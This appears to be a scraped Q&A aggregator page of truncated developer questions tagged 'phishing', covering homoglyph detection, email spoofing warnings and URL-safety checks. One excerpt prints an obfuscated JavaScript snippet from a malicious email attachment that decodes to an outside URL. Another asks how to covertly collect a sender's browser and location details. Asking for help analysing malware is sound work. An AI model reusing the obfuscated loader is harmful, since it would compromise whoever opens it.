phishing

Homoglyph attack detection in email phishing

不问归期 提交于 2020-12-30 06:51:38
问题 Main Question I am working on an API in Java that needs to detect the use of brands (e.g. PayPal, Mastercard etc.) in phishing emails. Obviously there are different strategies that the attackers use to target these brands so that they are harder to detect. For instance " rnastercard " looks very similar to " mastercard " and can fool an unsuspecting user. At this time I can easily detect the misspellings of these brands using a form of fuzzy string search. However the problem I am facing is

What does this suspicious phishing code do?

丶灬走出姿态 提交于 2019-12-23 09:15:44
问题 A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run. <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t

Using PHP/JavaScript link to get information about site visitor

天大地大妈咪最大 提交于 2019-12-21 21:25:26
问题 Somebody is trying to phish me, they are pretending to be one of my close friends to humiliate both of us. This person has created a fake email account, impersonating the person, and trying to get personal info out of me. I made sure with my friend that it wasn't actually him, now we're trying to figure out who it is. I want to send them a link to some kind of PHP or JS page, to collect at least a little info about their client (browser, operating system, maybe ISP location?), and then

iOS Safari suggests “phishing” when passing username:password to @url

笑着哭i 提交于 2019-12-20 03:04:03
问题 Passing a username and a password for Basic Authentication is comfortable; But not if iOS Safari tells me to stay away from my website every time. Example URL http://bytecode77:123456@example-subdomain.bytecode77.com Is there anything I can change in my code or webserver configuration to avoid such suspiciousness? 回答1: AFAIK, user credentials in URLs have been removed for security reasons and no longer appear in the protocol specs. I read that Chrome and IE do not support that at all anymore.

Email sent from web server causes gmail to treat as phishing. How to get rid of this?

情到浓时终转凉″ 提交于 2019-12-06 08:02:27
问题 I am sending account activation email from my .net app. I set the from address to "xyz.support@gmail.com" and from name "xyz" where xyz is the name of the domain i.e. our website. It was not a problem when we were using Google's SMTP server as I provided credentials to google during sending. But now I am using my own web server's SMTP to send the email. When I view the activation email in gmail, I get this: This message may not have been sent by: xyz.support@gmail.com Learn more Report

Service to check a URL for malware or phishing?

拈花ヽ惹草 提交于 2019-12-04 20:13:32
问题 Is there a service that lets me check a URL to see if it may possibly be a dangerous site? When a user exits our application by clicking on an untrusted link, we sent them through a "are you sure you want to leave" redirection screen. It'd be a nice touch to do a quick check to see if we should warn the user as well. 回答1: Try with Google Safe Browsing API. The Google Safe Browsing Lookup API is an experimental API that allows applications to check URLs against Google's constantly-updated

Using PHP/JavaScript link to get information about site visitor

↘锁芯ラ 提交于 2019-12-04 17:58:59
Somebody is trying to phish me, they are pretending to be one of my close friends to humiliate both of us. This person has created a fake email account, impersonating the person, and trying to get personal info out of me. I made sure with my friend that it wasn't actually him, now we're trying to figure out who it is. I want to send them a link to some kind of PHP or JS page, to collect at least a little info about their client (browser, operating system, maybe ISP location?), and then forward them to an actual website (like a youtube video or something). Having very basic knowledge of PHP, I

Email sent from web server causes gmail to treat as phishing. How to get rid of this?

点点圈 提交于 2019-12-04 13:04:58
I am sending account activation email from my .net app. I set the from address to "xyz.support@gmail.com" and from name "xyz" where xyz is the name of the domain i.e. our website. It was not a problem when we were using Google's SMTP server as I provided credentials to google during sending. But now I am using my own web server's SMTP to send the email. When I view the activation email in gmail, I get this: This message may not have been sent by: xyz.support@gmail.com Learn more Report phishing Is there a way to get rid of this so that gmail and other client don't show this message? Here is

Service to check a URL for malware or phishing?

大城市里の小女人 提交于 2019-12-03 12:54:07
Is there a service that lets me check a URL to see if it may possibly be a dangerous site? When a user exits our application by clicking on an untrusted link, we sent them through a "are you sure you want to leave" redirection screen. It'd be a nice touch to do a quick check to see if we should warn the user as well. Try with Google Safe Browsing API . The Google Safe Browsing Lookup API is an experimental API that allows applications to check URLs against Google's constantly-updated lists of suspected phishing and malware pages. You can use the Google Safe Browsing API to check if a URL is

Why do browsers allow onmousedown JS to change href?

▼魔方 西西 提交于 2019-12-03 04:17:51
问题 I've noticed for a very long time that when you try to copy a link location or open a link on Facebook, it modifies the link and passes it through l.php . For example, I can be sent to http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.google.com%2F&h=DKVUritNDJDJLDLVbldoDLFKBLOD5dlfDJY_-d3fgDUaA9b even though my browser render the link preview as http://www.google.com/ . Today, I took a closer look using Firebug and found that Facebook puts onmousedown="UntrustedLink.bootstrap($(this)[...] in
订阅 phishing